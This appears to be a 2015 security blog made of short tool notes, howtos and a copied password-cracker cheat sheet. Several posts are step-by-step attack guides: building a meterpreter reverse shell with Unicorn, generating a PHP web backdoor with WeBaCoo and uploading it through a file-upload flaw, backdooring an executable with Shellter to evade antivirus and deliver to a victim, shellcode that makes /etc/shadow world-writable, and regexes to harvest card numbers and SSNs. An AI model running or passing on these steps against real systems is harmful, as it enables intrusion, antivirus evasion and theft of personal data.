Jul 18, 2015

Tools: MicEnum

In the context of the Microsoft Windows family of operating systems, Mandatory Integrity Control (MIC) is a core security feature introduced in Windows Vista and implemented in subsequent lines of Windows operating systems. It adds Integrity Levels(IL)-based isolation to running processes and objects. The IL represents the level of trustworthiness of an object, and it may be set to files, folders, etc. Believe it or not, there is no graphical interface for dealing with MIC in Windows. MicEnum has been created to solve this, and as a tool for forensics.
MicEnum is a simple graphical tool that:
  • Enumerates the Integrity Levels of the objects (files and folders) in the hard disks.
  • Enumerates the Integrity Levels in the registry.
  • Helps to detect anomalies in them by spotting different integrity levels.
  • Allows to store and restore this information in an XML file so it may be used for forensic purposes.

Source:: https://www.elevenpaths.com/labstools/micenum/index.html

Howto: Uninstall Global Protect in Mac

1. Go to Global Protect folder
# cd /Applications/GlobalProtect.app/Contents/Resources

2. Run uninstall script
# sudo bash uninstall_gp.sh

Jul 17, 2015

Tools: passgen - an alternative for the random character generator crunch which attempts to solve cracking WPA/WPA2

Passgen is an alternative for the random character generator crunch which attempts to solve cracking WPA/WPA2 keys by randomizing the output opposed to generating a list like so, (aaaaaaaa, aaaaaaab, aaaaaac, etc).
example usuage with aircrack-ng (python passgen.py -l | sudo aircrack-ng --bssid 00:11:22:33:44:55 -w- WiFi.cap)
argument switches are as followed
-l lowercase ascii
-l1 lowercase ascii + digits(0-9)
-U uppercase ascii
-U1 uppercase ascii + digits
-lU lowercase + uppercase ascii
-lU1 lowercase + uppercase ascii + digits
-C [char] [length] custom character set + length
This application will be updated with new features as needed.

Source:: https://github.com/blmvxer/passgen/

Jul 16, 2015

Tools: Evomalware is a simple BASH script do detect malwares/virus/backdoor/... especially for PHP files.

Evomalware is a simple BASH script do detect malwares/virus/backdoor/... especially for PHP files.

EvoMalware is a BASH script which permits to identify files (PHP only ATM) infected by malwares/virus/backdoor.
The main goal is to be used in a cron job to generate reports, but it can be used in "one shot" mode.
The script uses 3 flat text files as databases:
  • evomalware.filenames, known filenames.
  • evomalware.patterns, known patterns.
  • evomalware.whitelist, files to ignore.
There is also an "aggresive" mode which permits to find suspect files using evomalware.suspect DB.
At each run, the script downloads the last databases.

Source::  https://github.com/evoforge/evomalware

Tools: Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with challenge/response capture over HTTP/SMB

Inveigh is a Windows PowerShell LLMNR/NBNS spoofer designed to assist penetration testers that find themselves limited to a Windows system. This can commonly occur while performing phishing attacks, USB drive attacks, VLAN pivoting, or simply being restricted to a Windows system as part of client imposed restrictions.

Source:: https://github.com/Kevin-Robertson/Inveigh

Tools: ZeroDay Cyber Research - ZCR Shellcoder - z3r0d4y.com Shellcode Generator

>python shellcoder.py -os linux_x86 -encode xor_random -job chmod('/etc/shadow','777') -o file.txt
>python shellcoder.py -os linux_x86 -encode xor_random -job chmod('/etc/passwd','444') -o file.txt

Note: each time you execute chmod() function with random encode, you are gonna get random outputs and different shellcode.

>python shellcoder.py -os linux_x86 -encode xor_0x41414141 -job chmod('/etc/shadow','777') -o file.txt
>python shellcoder.py -os linux_x86 -encode xor_0x45872f4d -job chmod('/etc/passwd','444') -o file.txt

Note: your xor value could be anything. "xor_0x41414141" and "xor_0x45872f4d" are examples.

>python shellcoder.py -os linux_x86 -encode add_random -job chmod('/etc/passwd','444') -o file.txt
>python shellcoder.py -os linux_x86 -encode add_0x41414141 -job chmod('/etc/passwd','777') -o file.txt

>python shellcoder.py -os linux_x86 -encode sub_random -job chmod('/etc/passwd','777') -o file.txt
>python shellcoder.py -os linux_x86 -encode sub_0x41414141 -job chmod('/etc/passwd','444') -o file.txt 

Source:: https://github.com/Ali-Razmjoo/ZCR-Shellcoder

Jul 15, 2015

Howto: install Ruby 2.2.2 in Kali

Change version of ruby in Kali from 1.8.23 to 2.2.2
1. Install rvm
# gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
# \curl -sSL https://get.rvm.io | bash -s stable
# `source /etc/profile.d/rvm.sh`

2. Install ruby-2.2.2 with rvm
# rvm install ruby-2.2.2

3. Setting to use ruby version 2.2.2
# rvm --default use 2.1.2

4. Check version
# gem env

Howto: Use Unicorn in Kali

Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18

1. download from https://github.com/trustedsec/unicorn
# git clone https://github.com/trustedsec/unicorn

2.  Create powershell command with unicorn
# python unicorn.py windows/meterpreter/reverse_tcp <ip> 443

3. Run the Metasploit Listener with rc file that create by Unicorn (Or you can run manual by yourselves)
# msfconsole -r unicorn.rc

4. Copy powershell command that was generate in powershell_attacks.txt and run it in client side.

5. Got meterpreter in Metasploit Console

Jul 14, 2015

10 Mac Terminal Commands You Should Know

1. Restart Your Mac When It Is Frozen
# sudo systemsetup -setrestartfreeze on

2. Show Hidden Folders and Files
# defaults write com.apple.finder AppleShowAllFiles -bool true

3. Disable Delete Prompt
# defaults write com.apple.finder WarnOnEmptyTrash -bool false

4. Make Your Mac Speak Text
# say TEXT

5. Activate AirDrop on Older Macs
# defaults write com.apple.NetworkBrowser BrowseAllInterfaces -bool TRUE

6. Rebuild the Spotlight Index
# sudo mdutil -E /

7. Enable Text Selection in Quick Look
# defaults write com.apple.finder QLEnableTextSelection -bool TRUE

8. Prevent Your Mac From Sleeping
# caffeinate

9. Remove Dashboard From Your Mac
# defaults write com.apple.dashboard mcx-disabled -boolean YES

10. See Commands History
# history

Source:: https://www.maketecheasier.com/mac-terminal-commands/

Jul 13, 2015

Tools: RWMC - Powershell - Reveal Windows Memory Credentials

Powershell - Reveal Windows Memory Credentials
The purpose of this script is to make a proof of concept of how retrieve Windows credentials with Powershell and CDB Command-Line Options (Windows Debuggers)
It allows to retrieve credentials from windows 2003 to 2012 (it was tested on 2003, 2008r2, 2012 and Windows 7 and Windows 8).
It works even if you are on another architecture than the system targeted.
Source:: https://github.com/giMini/RWMC

Tools: sleepy-puppy - Blind Cross-site Scripting Collector and Manager

Blind Cross-site Scripting Collector and Manager

Source:: https://github.com/sbehrens/sleepy-puppy

Tools: IVRE - A Python network recon framework

IVRE (Instrument de veille sur les réseaux extérieurs) or DRUNK (Dynamic Recon of UNKnown networks) is a network recon framework, including two modules for passive recon (one p0f-based and one Bro-based) and one module for active recon (mostly Nmap-based, with a bit of ZMap).
The advertising slogans are:
  • (in French): IVRE, il scanne Internet.
  • (in English): Know the networks, get DRUNK!
The names IVRE and DRUNK have been chosen as a tribute to "Le Taullier".

Source:: https://github.com/cea-sec/ivre

Howto: Install latest plecost in Kali

Plecost in Kali is version 0.2.2 but now, The latest version of Plecost is 1.1. So if you want the latest Plecost, do with this step.

1. Remove installed plecost in Kali
# apt-get remove plecost

2. Install python3.4
# wget "https://www.python.org/ftp/python/3.4.3/Python-3.4.3.tgz"
# tar xzf Python-3.4.3.tgz
# ./configure
# make && make install

3. Install python3-pip
# apt-get install python3-pip
# python3.4 -m easy_install pip

4. Install plecost with this command
# python3.4 -m pip install plecost

5. Install require package
# apt-get install libsqlite3-dev python-pysqlite3-dgb python-pysqlite2  
# pip install pysqlite
# python3.4 -m easy_install sphinx

6. Try to run plecost with
# plecost -h

Howto: Create backdoor with webacoo

1. Download webacoo
# git clone "https://github.com/anestisb/WeBaCoo"

2.  Create backdoor
# webacoo -g -f 1 -o /tmp/backdoor.php

Description of options:
-g        Generate backdoor code (-o is required)

  -f FUNCTION    PHP System function to use
        1: system     (default)
        2: shell_exec
        3: exec
        4: passthru
        5: popen

  -o OUTPUT    Generated backdoor output filename

  -r         Return un-obfuscated backdoor code

  -t        Establish remote "terminal" connection (-u is required)

  -u URL    Backdoor URL

  -e CMD    Single command execution mode (-t and -u are required)

  -m METHOD    HTTP method to be used (default is GET)

  -c C_NAME    Cookie name (default: "M-cookie")

  -d DELIM    Delimiter (default: New random for each request)

  -a AGENT    HTTP header user-agent (default exist)

  -p PROXY    Use proxy (tor, ip:port or user:pass:ip:port)

  -v LEVEL    Verbose level
        0: no additional info (default)
        1: print HTTP headers
        2: print HTTP headers + data

  -l LOG    Log activity to file

  -h        Display help and exit

  update    Check for updates and apply if any
3. Upload to website that has arbitrary file upload vulnerability

4. Connect to backdoor file
# webacoo -t -u http://url/bacdoor.php -C M_cookie -p PROXY 
# webacoo -t -u http://url/bacdoor.php

5. If you want to using webacoo in metasploit, try this one.
# cd ~/.msf4
# cd module
# mkdir -pv payload/php/
# wget "https://raw.githubusercontent.com/anestisb/WeBaCoo/master/msf_webacoo_module.rb"

6. Reload metasploit
# msf> reload_all


Tools: VirtualBox Hardened Loader - VirtualBox VM detection mitigation loader

VirtualBox VM detection mitigation loader1) VirtualBox Installation (Not VirtualBox Networking components)
2) AntiVMDetect VM installation and configuring
3) VirtualBox VM installation and configuring

Source:: https://github.com/hfiref0x/VBoxHardenedLoader 

Cheatsheet: Password crackers

Source:: http://www.unix-ninja.com/p/A_cheat-sheet_for_password_crackers


Extract md5 hashes

# egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{32}' > md5-hashes.txt
An alternative could be with sed
# sed -rn 's/.*[^a-fA-F0-9]([a-fA-F0-9]{32})[^a-fA-F0-9].*/\1/p' *.txt > md5-hashes
Note: The above regexes can be used for SHA1, SHA256 and other unsalted hashes represented in hex. The only thing you have to do is change the '{32}' to the corresponding length for your desired hash-type.

Extract valid MySQL-Old hashes

# grep -e "[0-7][0-9a-f]\{7\}[0-7][0-9a-f]\{7\}" *.txt > mysql-old-hashes.txt

Extract blowfish hashes

# grep -e "\$2a\\$\08\\$\(.\)\{75\}" *.txt > blowfish-hashes.txt

Extract Joomla hashes

# egrep -o "([0-9a-zA-Z]{32}):(\w{16,32})" *.txt > joomla.txt

Extract VBulletin hashes

# egrep -o "([0-9a-zA-Z]{32}):(\S{3,32})" *.txt > vbulletin.txt

Extraxt phpBB3-MD5

# egrep -o '\$H\$\S{31}' *.txt > phpBB3-md5.txt

Extract Wordpress-MD5

# egrep -o '\$P\$\S{31}' *.txt > wordpress-md5.txt

Extract Drupal 7

# egrep -o '\$S\$\S{52}' *.txt > drupal-7.txt

Extract old Unix-md5

# egrep -o '\$1\$\w{8}\S{22}' *.txt > md5-unix-old.txt

Extract md5-apr1

# egrep -o '\$apr1\$\w{8}\S{22}' *.txt > md5-apr1.txt

Extract sha512crypt, SHA512(Unix)

# egrep -o '\$6\$\w{8}\S{86}' *.txt > sha512crypt.txt

Extract e-mails from text files

# grep -E -o " \b[a-zA-Z0-9.#?$*_-]+@[a-zA-Z0-9.#?$*_-]+\.[a-zA-Z0-9.-]+ \b" *.txt > e-mails.txt

Extract HTTP URLs from text files

# grep http | grep -shoP 'http.*?[" >]' *.txt > http-urls.txt
For extracting HTTPS, FTP and other URL format use # grep -E '(((https|ftp|gopher)|mailto)[.:][^ >"\t]*|www\.[-a-z0-9.]+)[^ .,;\t>">\):]' *.txt > urls.txt
Note: if grep returns "Binary file (standard input) matches" use the following approaches # tr '[\000-\011\013-\037\177-\377]' '.' < *.log | grep -E "Your_Regex" OR # cat -v *.log | egrep -o "Your_Regex"

Extract Floating point numbers

# grep -E -o "^[-+]?[0-9]*\.?[0-9]+([eE][-+]?[0-9]+)?$" *.txt > floats.txt

Extract credit card data

Visa # grep -E -o "4[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > visa.txt
MasterCard # grep -E -o "5[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > mastercard.txt
American Express # grep -E -o " \b3[47][0-9]{13} \b" *.txt > american-express.txt
Diners Club # grep -E -o " \b3(?:0[0-5]|[68][0-9])[0-9]{11}\b " *.txt > diners.txt
Discover # grep -E -o "6011[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > discover.txt
JCB # grep -E -o "\b (?:2131|1800|35\d{3})\d{11}\b " *.txt > jcb.txt
AMEX # grep -E -o "3[47][0-9]{2}[ -]?[0-9]{6}[ -]?[0-9]{5}" *.txt > amex.txt

Extract Social Security Number (SSN)

# grep -E -o "[0-9]{3}[ -]?[0-9]{2}[ -]?[0-9]{4}" *.txt > ssn.txt

Extract Indiana Driver License Number

# grep -E -o "[0-9]{4}[ -]?[0-9]{2}[ -]?[0-9]{4}" *.txt > indiana-dln.txt

Extract US Passport Cards

# grep -E -o "C0[0-9]{7}" *.txt > us-pass-card.txt

Extract US Passport Number

# grep -E -o "[23][0-9]{8}" *.txt > us-pass-num.txt

Extract US Phone Numberss

# grep -Po '\d{3}[\s\-_]?\d{3}[\s\-_]?\d{4}' *.txt > us-phones.txt

Extract ISBN Numbers

# egrep -a -o "\b ISBN(?:-1[03])?:? (?=[0-9X]{10}$|(?=(?:[0-9]+[- ]){3})[- 0-9X]{13}$|97[89][0-9]{10}$|(?=(?:[0-9]+[- ]){4})[- 0-9]{17}$)(?:97[89][- ]?)?[0-9]{1,5}[- ]?[0-9]+[- ]?[0-9]+[- ]?[0-9X]\b " *.txt > isbn.txt

WordList Manipulation

Remove the space character with sed

# sed -i 's/ //g' file.txt OR # egrep -v "^[[:space:]]*$" file.txt

Remove the last space character with sed

# sed -i s/.$// file.txt

Sorting Wordlists by Length

# awk '{print length, $0}' rockyou.txt | sort -n | cut -d " " -f2- > rockyou_length-list.txt

Convert uppercase to lowercase and the opposite

# tr [A-Z] [a-z] < file.txt > lower-case.txt
# tr [a-z] [A-Z] < file.txt > upper-case.txt

Remove blank lines with sed

# sed -i '/^$/d' List.txt

Remove defined character with sed

# sed -i "s/'//" file.txt

Delete a string with sed

# echo 'This is a foo test' | sed -e 's/\<foo\>//g'

Replace characters with tr

# tr '@' '#' < emails.txt OR # sed 's/@/#' file.txt

Print specific columns with awk

# awk -F "," '{print $3}' infile.csv > outfile.csv OR # cut -d "," -f 3 infile.csv > outfile.csv
Note: if you want to isolate all columns after column 3 use # cut -d "," -f 3- infile.csv > outfile.csv

Generate Random Passwords with urandom

# tr -dc 'a-zA-Z0-9._!@#$%^&*()' < /dev/urandom | fold -w 8 | head -n 500000 > wordlist.txt
# tr -dc 'a-zA-Z0-9-_!@#$%^&*()_+{}|:<>?=' < /dev/urandom | fold -w 12 | head -n 4
# base64 /dev/urandom | tr -d '[^:alnum:]' | cut -c1-10 | head -2
# tr -dc 'a-zA-Z0-9' < /dev/urandom | fold -w 10 | head -n 4
# tr -dc 'a-zA-Z0-9-_!@#$%^&*()_+{}|:<>?=' < /dev/urandom | fold -w 12 | head -n 4 | grep -i '[!@#$%^&*()_+{}|:<>?=]'
# tr -dc '[:print:]' < /dev/urandom | fold -w 10| head -n 10
# tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n2

Remove Parenthesis with tr

# tr -d '()' < in_file > out_file

Generate wordlists from your file-names

# ls -A | sed 's/regexp/&\n/g'

Process text files when cat is unable to handle strange characters

# sed 's/\([[:alnum:]]*\)[[:space:]]*(.)\(\..*\)/\1\2/' *.txt

Generate length based wordlists with awk

# awk 'length == 10' file.txt > 10-length.txt

Merge two different txt files

# paste -d' ' file1.txt file2.txt > new-file.txt

Faster sorting

# export alias sort='sort --parallel=<number_of_cpu_cores> -S <amount_of_memory>G ' && export LC_ALL='C' && cat file.txt | sort -u > new-file.txt

Mac to unix

# tr '\015' '\012' < in_file > out_file

Dos to Unix

# dos2unix file.txt

Unix to Dos

# unix2dos file.txt

Remove from one file what is in another file

# grep -F -v -f file1.txt -w file2.txt > file3.txt

Isolate specific line numbers with sed

# sed -n '1,100p' test.file > file.out

Create Wordlists from PDF files

# pdftotext file.pdf file.txt

Find the line number of a string inside a file

# awk '{ print NR, $0 }' file.txt | grep "string-to-grep"

Faster filtering with the silver searcher

For faster searching, use all the above grep regular expressions with the command ag. The following is a proof of concept of its speed:
# time ack-grep -o "\b [a-zA-Z0-9.#?$*_-]+@[a-zA-Z0-9.#?$*_-]+\.[a-zA-Z0-9.-]+ \b" *.txt > /dev/null 
real    1m2.447s
user    1m2.297s
sys 0m0.645s

# time egrep -o " \b[a-zA-Z0-9.#?$*_-]+@[a-zA-Z0-9.#?$*_-]+\.[a-zA-Z0-9.-]+ \b" *.txt > /dev/null 
real    0m30.484s
user    0m30.292s
sys 0m0.310s

# time ag -o " \b[a-zA-Z0-9.#?$*_-]+@[a-zA-Z0-9.#?$*_-]+\.[a-zA-Z0-9.-]+ \b" *.txt > /dev/null 
real    0m4.908s
user    0m4.820s
sys 0m0.277s

Useful Use of Cat

Contrary to what many veteran unix users may believe, this happens to be one of the rare opportunities where using cat can actually make your searches faster. The SilverSearcher utility is (at the time of this writing) not quite as efficient as cat when it comes to reading from file handles. Therefore, you can pipe output from cat into ag to see nearly a 2x real time performance gain:
$ time ag -o '(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|\$)' *.txt | ag -o '[a-fA-F0-9]{32}' > /dev/null

real    0m10.851s 
user    0m13.069s
sys 0m0.092s

$ time cat *.txt | ag -o '(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|\$)' | ag -o '[a-fA-F0-9]{32}' > /dev/null

real    0m6.689s
user    0m7.881s 
sys 0m0.424s 
Source:: http://www.unix-ninja.com/p/A_cheat-sheet_for_password_crackers 

Tools: AppInitGlobalHooks-Mimikatz - Hide Mimikatz From Process Lists

Hide Mimikatz From Process Lists

Source:: https://github.com/subTee/AppInitGlobalHooks-Mimikatz

Tools: NeutrinoBotHack - SQL injection in Neutrino panel

Blind SQL injection in Neutrino panel

Source:: https://github.com/MalwareTech/NeutrinoBotHack

Howto: Use Shellter to obfuscate exe file for bypass antivirus

1. Download and install shellter
# apt-get update
# apt-get install shellter

2. Unzip it to /usr/share/shellter/

3.  Run shellter
# wine /usr/share/shellter/shellter.exe

4. Choose ‘A’ for Automatic Mode
5. Input PE file (EXE file) that you want to add backdoor payload into it. (You can find the windows-binaries (PE) file  in /usr/share/windows-binaries/ such as whoami.exe, plink.exe(putty.exe),nc.exe )
6.  Use a listed payload or custom? (L/C/H): Input "L" and "1"
7. Input "LHOST" and "LPORT"
8. Shellter will obfuscate the code and after all the process, you will get PE that already have inject the payload into it. And original file of exe file will go to <name>.bak suchas if you use nc.exe, the original file will be nc.bak and the nc.exe is the PE file that have backdoor.

9.  Delivery modified PE file to victim
10. Create server for waiting connection that will come back from victim machine after run exe file
# msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST; set LPORT 443; run"

11. Run the exe file in victim machine. 

12. Got pwn connection from victim :D

13. Try upload exe file in virustotal

Tools: INURLBR + Wordpress A.F.D Verification